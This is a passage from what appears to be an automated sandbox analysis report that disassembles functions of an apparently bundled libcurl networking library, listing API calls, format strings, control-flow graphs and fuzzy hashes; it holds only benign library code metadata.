                                                                                                                                  • Instruction Fuzzy Hash: FB316E76E0011457EB218D69ECC2BABB7ACDB816A5F0405FBEC0CDB242E76DCC1182E1
                                                                                                                                  Function 6B8D36A0 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 211networkCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • getpeername.WS2_32(?,?,?), ref: 6B8D36FE
                                                                                                                                  • WSAGetLastError.WS2_32 ref: 6B8D3708
                                                                                                                                    • Part of subcall function 6B90A0E0: GetLastError.KERNEL32(?,?,00000100), ref: 6B90A0E7
                                                                                                                                    • Part of subcall function 6B9005D0: curl_mvsnprintf.LIBCURL(?,00000100,6B8FC830,?), ref: 6B900610
                                                                                                                                  • getsockname.WS2_32(?,?,00000080), ref: 6B8D3772
                                                                                                                                  • WSAGetLastError.WS2_32 ref: 6B8D377C
                                                                                                                                  Strings
                                                                                                                                  • getpeername() failed with errno %d: %s, xrefs: 6B8D3724
                                                                                                                                  • ssrem inet_ntop() failed with errno %d: %s, xrefs: 6B8D3801
                                                                                                                                  • getsockname() failed with errno %d: %s, xrefs: 6B8D3798
                                                                                                                                  • ssloc inet_ntop() failed with errno %d: %s, xrefs: 6B8D38A0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$curl_mvsnprintfgetpeernamegetsockname
                                                                                                                                  • String ID: getpeername() failed with errno %d: %s$getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s$ssrem inet_ntop() failed with errno %d: %s
                                                                                                                                  • API String ID: 673488319-670633250
                                                                                                                                  • Opcode ID: 16f6105c519ef0b2bd3e0279cbe4f13fa120267730848af49d5a3430940a6ea6
                                                                                                                                  • Instruction ID: 3241dc4535d3ef40d0b5423c6ced990bc8c10a394a306dae62725b6c6aac6820
                                                                                                                                  • Opcode Fuzzy Hash: 16f6105c519ef0b2bd3e0279cbe4f13fa120267730848af49d5a3430940a6ea6
                                                                                                                                  • Instruction Fuzzy Hash: 7B81D675900608ABD721DF74C841BEAB3F8FF59308F1045AEE99D97242EB35BA85CB50
                                                                                                                                  Function 6B8D16D0 Relevance: 12.1, APIs: 8, Instructions: 79networkCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • curl_msnprintf.LIBCURL(?,0000000C,6B93B330,?), ref: 6B8D16FA
                                                                                                                                    • Part of subcall function 6B8D6E10: getaddrinfo.WS2_32(?,?,?,6B93B330), ref: 6B8D6E2E
                                                                                                                                  • WSAGetLastError.WS2_32 ref: 6B8D1722
                                                                                                                                  • WSAGetLastError.WS2_32 ref: 6B8D1728
                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6B8D173B
                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6B8D1749
                                                                                                                                  • send.WS2_32(?,?,00000001,00000000), ref: 6B8D1778
                                                                                                                                  • WSAGetLastError.WS2_32 ref: 6B8D1782
                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6B8D1790
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalErrorLastSection$Leave$Entercurl_msnprintfgetaddrinfosend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1592919352-0
                                                                                                                                  • Opcode ID: b525758311a51527db36f3348d10dd264a97e639c4da523467e38c5993db4181
                                                                                                                                  • Instruction ID: f4e571c50a500f5d292376d5cd2b68964b284bd3cc644e6962cf756dfa1678fc
                                                                                                                                  • Opcode Fuzzy Hash: b525758311a51527db36f3348d10dd264a97e639c4da523467e38c5993db4181
                                                                                                                                  • Instruction Fuzzy Hash: 5E21A335500619EFDB20AFB5CC85BABB7F9EF45300F004A2AE656C3250EB35E915CBA0
                                                                                                                                  Function 6B8EA820 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 114COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 950 6b8ea820-6b8ea850 call 6b8d2a10 call 6b8eee30 955 6b8ea97a-6b8ea989 call 6b91db71 950->955 956 6b8ea856-6b8ea85c 950->956 958 6b8ea978 956->958 959 6b8ea862-6b8ea869 956->959 958->955 961 6b8ea86b-6b8ea871 959->961 962 6b8ea877-6b8ea882 call 6b8eed40 959->962 961->958 961->962 962->958 965 6b8ea888-6b8ea890 962->965 966 6b8ea93a-6b8ea944 965->966 967 6b8ea896-6b8ea89c 965->967 968 6b8ea946-6b8ea94a call 6b91cee0 966->968 969 6b8ea975 966->969 970 6b8ea89e-6b8ea8ab 967->970 971 6b8ea8ad-6b8ea8b5 967->971 974 6b8ea94f-6b8ea956 968->974 969->958 973 6b8ea8ba-6b8ea91a curl_msnprintf call 6b914de0 call 6b914d50 970->973 971->973 973->955 982 6b8ea91c-6b8ea938 call 6b8eaee0 973->982 974->958 977 6b8ea958-6b8ea974 call 6b8d2a10 call 6b91db71 974->977 982->955 982->966
                                                                                                                                  APIs
                                                                                                                                  • curl_msnprintf.LIBCURL(?,00000080,PROXY %s %s %s %li %li,?,?,?,?,?), ref: 6B8EA8EC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_msnprintf
                                                                                                                                  • String ID: PROXY %s %s %s %li %li$TCP4$TCP6
                                                                                                                                  • API String ID: 1809024409-1242256665
                                                                                                                                  • Opcode ID: a90f215344d6a39a09428f975154f263db92eb9a2ce77a3c3742b0b94be0ea7d
                                                                                                                                  • Instruction ID: fac14e071e3d0ec2b9652a98a1d44de45f3afa87c49179a039b6a59471682759
                                                                                                                                  • Opcode Fuzzy Hash: a90f215344d6a39a09428f975154f263db92eb9a2ce77a3c3742b0b94be0ea7d
                                                                                                                                  • Instruction Fuzzy Hash: B841C675944248AAEB11DB74CC01FEA77B89F06608F0448E6F959DB242E73AE607CB71
                                                                                                                                  Function 6B8E1650 Relevance: 6.2, APIs: 4, Instructions: 151COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • curl_multi_remove_handle.LIBCURL(?), ref: 6B8E1681
                                                                                                                                  • curl_multi_cleanup.LIBCURL(?), ref: 6B8E1691
                                                                                                                                  • curl_slist_free_all.LIBCURL(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6B8E1904
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_multi_cleanupcurl_multi_remove_handlecurl_slist_free_all
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3107128920-0
                                                                                                                                  • Opcode ID: cad139307954d22f42981d7fa00797b7cfdca1df46f941657f90c769d66201b6
                                                                                                                                  • Instruction ID: 2314a1c1e53a9bda98c212f70212f50dc1bb9e6455883eabd88c217f9d1f9a3a
                                                                                                                                  • Opcode Fuzzy Hash: cad139307954d22f42981d7fa00797b7cfdca1df46f941657f90c769d66201b6
                                                                                                                                  • Instruction Fuzzy Hash: 14612D79004B60EBEB215FB4D909BC6BBE5BF07309F404C59E5AA92260C7B9A054CB75
                                                                                                                                  Function 6B92F692 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1078 6b92f692-6b92f6a7 GetLastError 1079 6b92f6c5-6b92f6cf call 6b92fb8f 1078->1079 1080 6b92f6a9-6b92f6b3 call 6b92fb50 1078->1080 1085 6b92f6d1-6b92f6d8 call 6b92f78d 1079->1085 1086 6b92f6ba 1079->1086 1087 6b92f6c0 1080->1087 1088 6b92f6b5-6b92f6b8 1080->1088 1092 6b92f6dd-6b92f6e3 1085->1092 1091 6b92f6bc-6b92f6be 1086->1091 1087->1079 1088->1086 1090 6b92f732 1088->1090 1093 6b92f734-6b92f746 SetLastError 1090->1093 1091->1093 1094 6b92f6e5-6b92f6f3 call 6b92fb8f 1092->1094 1095 6b92f6fc-6b92f70a call 6b92fb8f 1092->1095 1100 6b92f6f4-6b92f6fa call 6b92f7ea 1094->1100 1101 6b92f70c-6b92f71b call 6b92fb8f 1095->1101 1102 6b92f71d-6b92f72f call 6b92f33d call 6b92f7ea 1095->1102 1100->1091 1101->1100 1102->1090
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(00000000,?,00000000,6B921F4E,6B928951,6B928465,?,00000000), ref: 6B92F697
                                                                                                                                  • _free.LIBCMT ref: 6B92F6F4
                                                                                                                                  • _free.LIBCMT ref: 6B92F72A
                                                                                                                                  • SetLastError.KERNEL32(00000000,00000015,000000FF,?,?,?,?,?,?,?,?,6B928987,00000000,?,?,0000000A), ref: 6B92F735
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2283115069-0
                                                                                                                                  • Opcode ID: cf8ca2a50ec91477e0fc098017f01273862a147ea347ff99d34e5a6010446a6e
                                                                                                                                  • Instruction ID: 0e0dcfd8c7d58ef51669b544f32f7bb77f34d8cf1235bd20a000a917d7ed891f
                                                                                                                                  • Opcode Fuzzy Hash: cf8ca2a50ec91477e0fc098017f01273862a147ea347ff99d34e5a6010446a6e
                                                                                                                                  • Instruction Fuzzy Hash: 3A11CE36E685053ADB0116788D96F2A336EDBE67BCB200234F528921E8EB39C8064660
                                                                                                                                  Function 6B8F83D0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 251COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1111 6b8f83d0-6b8f83f9 1112 6b8f83ff-6b8f843c call 6b8d14e0 1111->1112 1113 6b8f8551-6b8f8563 call 6b91db71 1111->1113 1120 6b8f843e-6b8f8441 1112->1120 1121 6b8f8448 1112->1121 1120->1121 1122 6b8f8443-6b8f8446 1120->1122 1123 6b8f844c-6b8f8457 1121->1123 1122->1121 1122->1123 1124 6b8f8459-6b8f8465 1123->1124 1125 6b8f8468-6b8f846b 1123->1125 1124->1125 1126 6b8f846d-6b8f8478 call 6b8fc6d0 1125->1126 1127 6b8f8487-6b8f849d 1125->1127 1126->1127 1140 6b8f847a-6b8f8484 1126->1140 1130 6b8f849f-6b8f84ab 1127->1130 1131 6b8f84f1-6b8f84f8 1127->1131 1135 6b8f84bd-6b8f84ea call 6b8f2020 call 6b8f69d0 1130->1135 1136 6b8f84ad-6b8f84ba call 6b90eee0 1130->1136 1132 6b8f84fa-6b8f8504 call 6b903fd0 1131->1132 1133 6b8f8507-6b8f850c 1131->1133 1132->1133 1138 6b8f850e-6b8f8520 call 6b8f2020 1133->1138 1139 6b8f8523-6b8f8531 1133->1139 1135->1131 1136->1135 1138->1139 1145 6b8f8564-6b8f8579 1139->1145 1146 6b8f8533-6b8f8544 1139->1146 1140->1127 1150 6b8f858f-6b8f85b5 call 6b8e7df0 1145->1150 1151 6b8f857b-6b8f8585 call 6b8e8780 1145->1151 1146->1113 1153 6b8f8546-6b8f854e call 6b904010 1146->1153 1162 6b8f85de-6b8f85ef 1150->1162 1163 6b8f85b7-6b8f85bf 1150->1163 1151->1150 1153->1113 1164 6b8f8619-6b8f8620 1162->1164 1165 6b8f85f1-6b8f85f8 1162->1165 1166 6b8f85c0-6b8f85d3 call 6b914db0 1163->1166 1168 6b8f86e9-6b8f8704 call 6b8d2a10 call 6b8d23e0 1164->1168 1169 6b8f8626-6b8f862a 1164->1169 1165->1164 1167 6b8f85fa-6b8f8601 1165->1167 1180 6b8f85d5-6b8f85db 1166->1180 1167->1164 1171 6b8f8603-6b8f860a 1167->1171 1192 6b8f8706-6b8f870e call 6b904010 1168->1192 1193 6b8f8711-6b8f8720 call 6b8e1bd0 1168->1193 1172 6b8f863f-6b8f8646 1169->1172 1173 6b8f862c-6b8f8639 1169->1173 1171->1164 1176 6b8f860c-6b8f8613 1171->1176 1177 6b8f8648-6b8f864e 1172->1177 1178 6b8f8650-6b8f8657 1172->1178 1173->1168 1173->1172 1176->1164 1176->1168 1181 6b8f8678-6b8f869f curl_msnprintf 1177->1181 1182 6b8f8659-6b8f865f 1178->1182 1183 6b8f8661-6b8f8668 1178->1183 1180->1162 1185 6b8f86ac-6b8f86b8 call 6b8d24b0 1181->1185 1186 6b8f86a1-6b8f86a9 call 6b904010 1181->1186 1182->1181 1187 6b8f866a-6b8f8670 1183->1187 1188 6b8f8672 1183->1188 1200 6b8f86dd-6b8f86e7 1185->1200 1201 6b8f86ba-6b8f86db call 6b9006b0 1185->1201 1186->1185 1187->1181 1188->1181 1192->1193 1202 6b8f8727-6b8f872d call 6b9280b5 1193->1202 1203 6b8f8722-6b8f8724 1193->1203 1200->1202 1201->1202 1206 6b8f8733-6b8f8758 call 6b8e1ce0 call 6b91db71 1202->1206 1203->1202
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6B8D14E0: EnterCriticalSection.KERNEL32(?,?,00000000,?,?,?,6B8E1C62,?,00000000), ref: 6B8D15E0
                                                                                                                                    • Part of subcall function 6B8D14E0: LeaveCriticalSection.KERNEL32(?,?,?,6B8E1C62,?,00000000), ref: 6B8D15F3
                                                                                                                                    • Part of subcall function 6B8D14E0: closesocket.WS2_32(000006FC), ref: 6B8D1642
                                                                                                                                  • curl_msnprintf.LIBCURL(?,00000100,Connection #%ld to host %s left intact,?,?), ref: 6B8F8690
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$EnterLeaveclosesocketcurl_msnprintf
                                                                                                                                  • String ID: %s$Connection #%ld to host %s left intact
                                                                                                                                  • API String ID: 283241466-118628944
                                                                                                                                  • Opcode ID: b6d415b2ec1963aacd64270e08bf56d89a1e5894fce04f4dce2fcb74518963ff
                                                                                                                                  • Instruction ID: 10319204d4a33f693b2333ab0764f673ca5b6c7c29237c6c178decdd6b35a0c7
                                                                                                                                  • Opcode Fuzzy Hash: b6d415b2ec1963aacd64270e08bf56d89a1e5894fce04f4dce2fcb74518963ff
                                                                                                                                  • Instruction Fuzzy Hash: DEA13870600B04EFDB218F75CC49BDAB7E8BF06348F0009A9E86957291DB7CA595CFA1
                                                                                                                                  Function 6B8E84A0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1212 6b8e84a0-6b8e84e5 1213 6b8e84f7-6b8e8507 call 6b8e8840 1212->1213 1214 6b8e84e7-6b8e84f4 call 6b903fd0 1212->1214 1219 6b8e8509-6b8e8522 call 6b9006b0 1213->1219 1220 6b8e8525-6b8e852c 1213->1220 1214->1213 1219->1220 1222 6b8e852e-6b8e8536 call 6b904010 1220->1222 1223 6b8e8539-6b8e853d 1220->1223 1222->1223 1226 6b8e8543-6b8e8551 1223->1226 1227 6b8e8661 1223->1227 1229 6b8e8589-6b8e8598 inet_pton 1226->1229 1230 6b8e8553-6b8e8580 call 6b8f7550 * 2 1226->1230 1231 6b8e8664-6b8e867c call 6b91db71 1227->1231 1233 6b8e859a-6b8e85b0 call 6b8d6fb0 1229->1233 1234 6b8e85b9-6b8e85c8 inet_pton 1229->1234 1252 6b8e86cf-6b8e86e2 call 6b91db71 1230->1252 1266 6b8e8586 1230->1266 1244 6b8e867d-6b8e8684 1233->1244 1245 6b8e85b6 1233->1245 1238 6b8e85ca-6b8e85e0 call 6b8d6fb0 1234->1238 1239 6b8e85e9-6b8e85f4 call 6b8e8a60 1234->1239 1238->1244 1251 6b8e85e6 1238->1251 1239->1252 1253 6b8e85fa-6b8e85fe 1239->1253 1249 6b8e8686-6b8e8690 call 6b903fd0 1244->1249 1250 6b8e8693-6b8e86ad call 6b8e7ae0 1244->1250 1245->1234 1249->1250 1269 6b8e86af-6b8e86b7 call 6b904010 1250->1269 1270 6b8e86ba-6b8e86be 1250->1270 1251->1239 1258 6b8e8619-6b8e8622 call 6b8e78a0 1253->1258 1259 6b8e8600-6b8e8607 1253->1259 1268 6b8e8627-6b8e862e 1258->1268 1259->1258 1265 6b8e8609-6b8e8617 call 6b8fdb40 1259->1265 1265->1268 1266->1229 1268->1244 1272 6b8e8630-6b8e8633 1268->1272 1269->1270 1274 6b8e86cb-6b8e86cd 1270->1274 1275 6b8e86c0-6b8e86c9 call 6b8d6de0 1270->1275 1272->1227 1276 6b8e8635-6b8e8641 1272->1276 1274->1231 1275->1227 1279 6b8e864a call 6b8d1380 1276->1279 1280 6b8e8643-6b8e8648 call 6b8fdcd0 1276->1280 1285 6b8e864f-6b8e8654 1279->1285 1280->1285 1285->1252 1286 6b8e8656-6b8e865e 1285->1286 1286->1227
                                                                                                                                  APIs
                                                                                                                                  • inet_pton.WS2_32(00000002,00000000,?), ref: 6B8E8590
                                                                                                                                  • inet_pton.WS2_32(00000017,00000000,?), ref: 6B8E85C0
                                                                                                                                  Strings
                                                                                                                                  • Hostname %s was found in DNS cache, xrefs: 6B8E850A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: inet_pton
                                                                                                                                  • String ID: Hostname %s was found in DNS cache
                                                                                                                                  • API String ID: 1350483568-2672672863
                                                                                                                                  • Opcode ID: 6bf5544faa7be49911fb875d4e92e1801faeca3ab78285083607480dd6a16c36
                                                                                                                                  • Instruction ID: 0a6e23b2ccf60b4830ab23bb86728379e1faea61f08bdee902f993f1823e5408
                                                                                                                                  • Opcode Fuzzy Hash: 6bf5544faa7be49911fb875d4e92e1801faeca3ab78285083607480dd6a16c36
                                                                                                                                  • Instruction Fuzzy Hash: C761F471D00219ABDB118FB4DC46BEFBBB8AF06318F000569E91477291E7399A56CBF1
                                                                                                                                  Function 6B8D2A60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8D2B71
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8D2BA0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                  • String ID: Connection time-out
                                                                                                                                  • API String ID: 885266447-165637984
                                                                                                                                  • Opcode ID: d71c490874930c85ed237f0f341cbe95dda15b0d28c68d1aa5859bc7cab1c224
                                                                                                                                  • Instruction ID: 3c370d83fd4a684f8d9c5e1872114f6b3a31e78d75a2ef39d15dbb722c0cbfc7
                                                                                                                                  • Opcode Fuzzy Hash: d71c490874930c85ed237f0f341cbe95dda15b0d28c68d1aa5859bc7cab1c224
                                                                                                                                  • Instruction Fuzzy Hash: 67718E71E00615DFDB14CF68C841BAAB7B5FF84314F148ABAD818AB351E77A9D42CB80
                                                                                                                                  Function 6B8E1930 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  • User-Agent: %s, xrefs: 6B8E1A47
                                                                                                                                  • Connected to %s (%s) port %ld (#%ld), xrefs: 6B8E1B72
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_multi_cleanupcurl_multi_remove_handlecurl_slist_free_all
                                                                                                                                  • String ID: Connected to %s (%s) port %ld (#%ld)$User-Agent: %s
                                                                                                                                  • API String ID: 3107128920-3248832348
                                                                                                                                  • Opcode ID: 61a75b0d45157d91d6f337a739ec1cea5752649828c84ca23b91465bc5fe41bc
                                                                                                                                  • Instruction ID: fcf6d59e8aa25f08cf3e561235f9e1eca7b0624d857a051e7068fd69aa04a689
                                                                                                                                  • Opcode Fuzzy Hash: 61a75b0d45157d91d6f337a739ec1cea5752649828c84ca23b91465bc5fe41bc
                                                                                                                                  • Instruction Fuzzy Hash: 37714A75A00754ABD7119F38CC41BD6B7E9FF82318F040DA9E96C87282E779A255CBB0
                                                                                                                                  Function 6B8E26A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 131COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • curl_maprintf.LIBCURL(User-Agent: %s), ref: 6B8E270E
                                                                                                                                  Strings
                                                                                                                                  • User-Agent: %s, xrefs: 6B8E2709
                                                                                                                                  • Connected to %s (%s) port %ld (#%ld), xrefs: 6B8E2828
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_maprintf
                                                                                                                                  • String ID: Connected to %s (%s) port %ld (#%ld)$User-Agent: %s
                                                                                                                                  • API String ID: 3307269620-3248832348
                                                                                                                                  • Opcode ID: 142483f005b42d7e7bcf81e2200eb4a61798e80d73aef8555d8eb047d1776434
                                                                                                                                  • Instruction ID: a2b964f3fbce0f02d16541a8d29aff561bacbb66fc94a6f82ff5b6f7c4038ab3
                                                                                                                                  • Opcode Fuzzy Hash: 142483f005b42d7e7bcf81e2200eb4a61798e80d73aef8555d8eb047d1776434
                                                                                                                                  • Instruction Fuzzy Hash: BB41F875904B459BE721CF38DC44BE3B7E8BF46308F040A9DE4A947182E7796255CBA1
                                                                                                                                  Function 6B8D6E10 Relevance: 4.6, APIs: 3, Instructions: 146networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • getaddrinfo.WS2_32(?,?,?,6B93B330), ref: 6B8D6E2E
